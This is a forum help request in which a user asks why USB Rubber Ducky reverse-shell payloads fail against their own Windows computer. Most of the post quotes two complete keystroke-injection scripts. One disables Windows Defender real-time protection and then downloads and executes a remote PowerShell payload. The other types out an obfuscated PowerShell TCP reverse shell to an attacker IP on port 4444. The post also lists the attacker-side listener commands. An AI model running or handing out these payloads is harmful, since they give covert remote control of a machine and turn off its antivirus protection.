Jump to content

Problem with Reverse shell - No connection


Dominik75
 Share

Recommended Posts

Hello forum members
following yotube videos on "Get a Reverse Shell with the USB Rubber Ducky by downloading playloads from  https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and REVERSEDUCKY loads," I could not properly make any of the payloads for remote access I did everything like in the videos in this regard and the included payloads on the HAK5 website. Both computers on the same network. I put a rubber ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works: python -m http.server 8000 and the second panel nc -l -p 4444. Unfortunately, I cannot connect to Windows through the shell. Payload.ps1 is on the server of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips.Sample loads: 

REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');"
ENTER
STRING exit
ENTER

anather loads:

REM       ReverseDucky2
REM       Version 1.3
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM       Author: 0iphor13

REM       Reverse shell executed in the background
REM       Fill in Attacker-IP and Port in Line 19
REM       DON'T FORGET TO START LISTENER


DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER

DELAY 200
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
DELAY 100
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
DELAY 100
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
DELAY 100
ENTER

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...